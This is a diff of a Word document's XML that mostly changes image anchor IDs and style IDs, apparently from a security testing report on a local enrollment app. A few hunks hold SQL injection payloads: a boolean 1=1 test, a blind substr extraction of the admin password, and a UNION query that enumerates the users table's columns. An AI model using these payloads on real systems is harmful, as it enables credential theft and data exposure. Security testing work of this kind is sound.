+        <w:pict w14:anchorId="018D884E">
           <v:shape id="_x0000_i1048" type="#_x0000_t75" style="width:495pt;height:390pt">
             <v:imagedata r:id="rId27" o:title=""/>
           </v:shape>
@@ -5800,7 +5867,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="13CBEC88">
+        <w:pict w14:anchorId="2DB2D21B">
           <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId28" o:title=""/>
           </v:shape>
@@ -5986,7 +6053,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="113DDF7F">
+        <w:pict w14:anchorId="4033315F">
           <v:shape id="_x0000_i1050" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId29" o:title=""/>
           </v:shape>
@@ -6172,7 +6239,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="0DB3C68F">
+        <w:pict w14:anchorId="06F9ED82">
           <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId30" o:title=""/>
           </v:shape>
@@ -6358,7 +6425,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="44D51100">
+        <w:pict w14:anchorId="3D1943E2">
           <v:shape id="_x0000_i1052" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId31" o:title=""/>
           </v:shape>
@@ -6544,7 +6611,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="3CF9F78E">
+        <w:pict w14:anchorId="0D4DFCA9">
           <v:shape id="_x0000_i1053" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId32" o:title=""/>
           </v:shape>
@@ -6730,7 +6797,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="5C9AD229">
+        <w:pict w14:anchorId="03E2A4C8">
           <v:shape id="_x0000_i1054" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId33" o:title=""/>
           </v:shape>
@@ -6891,16 +6958,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Target URL: http://localh</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t>ost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
+        <w:t>Target URL: http://localhost:8000/safe/enrollment?reference=ENR-2026-001%27+AND+1%3D1+--+</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6925,7 +6983,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="3A7D44FD">
+        <w:pict w14:anchorId="28D847C7">
           <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId34" o:title=""/>
           </v:shape>
@@ -7111,7 +7169,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="72CC6C6F">
+        <w:pict w14:anchorId="0C465CD6">
           <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId34" o:title=""/>
           </v:shape>
@@ -7297,7 +7355,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="2768C5F4">
+        <w:pict w14:anchorId="0264326C">
           <v:shape id="_x0000_i1057" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId35" o:title=""/>
           </v:shape>
@@ -7386,7 +7444,16 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
+        <w:t xml:space="preserve">Input or attack setup: ENR-2026-001' AND </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">substr((SELECT password FROM users WHERE username='admin'),1,1)='Z' -- </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7483,7 +7550,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="797EDD35">
+        <w:pict w14:anchorId="58EF00F2">
           <v:shape id="_x0000_i1058" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId36" o:title=""/>
           </v:shape>
@@ -7669,7 +7736,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="12F9239B">
+        <w:pict w14:anchorId="64042818">
           <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId37" o:title=""/>
           </v:shape>
@@ -7855,7 +7922,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="7AD7B3C4">
+        <w:pict w14:anchorId="0E830BF2">
           <v:shape id="_x0000_i1060" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId38" o:title=""/>
           </v:shape>
@@ -8041,7 +8108,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="40186AD4">
+        <w:pict w14:anchorId="546DF39E">
           <v:shape id="_x0000_i1061" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId39" o:title=""/>
           </v:shape>
@@ -8227,7 +8294,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="03C70DFA">
+        <w:pict w14:anchorId="1927D0CA">
           <v:shape id="_x0000_i1062" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId40" o:title=""/>
           </v:shape>
@@ -8316,16 +8383,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t>Input or attack setup: ' UNI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ON SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
+        <w:t xml:space="preserve">Input or attack setup: ' UNION SELECT 'COLUMN',name,type FROM pragma_table_info('users') -- </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8422,7 +8480,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="066FE3D3">
+        <w:pict w14:anchorId="27818770">
           <v:shape id="_x0000_i1063" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId41" o:title=""/>
           </v:shape>
@@ -8608,7 +8666,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="0D83CB61">
+        <w:pict w14:anchorId="2F35940D">
           <v:shape id="_x0000_i1064" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId42" o:title=""/>
           </v:shape>
@@ -8794,7 +8852,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:pict w14:anchorId="141E04C9">
+        <w:pict w14:anchorId="357D91B0">
           <v:shape id="_x0000_i1065" type="#_x0000_t75" style="width:495pt;height:344.25pt">
             <v:imagedata r:id="rId43" o:title=""/>
           </v:shape>
@@ -9271,7 +9329,7 @@
     <w:link w:val="TitleChar"/>
     <w:uiPriority w:val="10"/>
     <w:qFormat/>
-    <w:rsid w:val="00DA4882"/>
+    <w:rsid w:val="009C2277"/>
     <w:pPr>
       <w:spacing w:before="240" w:after="60"/>
       <w:jc w:val="center"/>
@@ -9291,7 +9349,7 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Title"/>
     <w:uiPriority w:val="10"/>
-    <w:rsid w:val="00DA4882"/>
+    <w:rsid w:val="009C2277"/>
     <w:rPr>
       <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
       <w:b/>
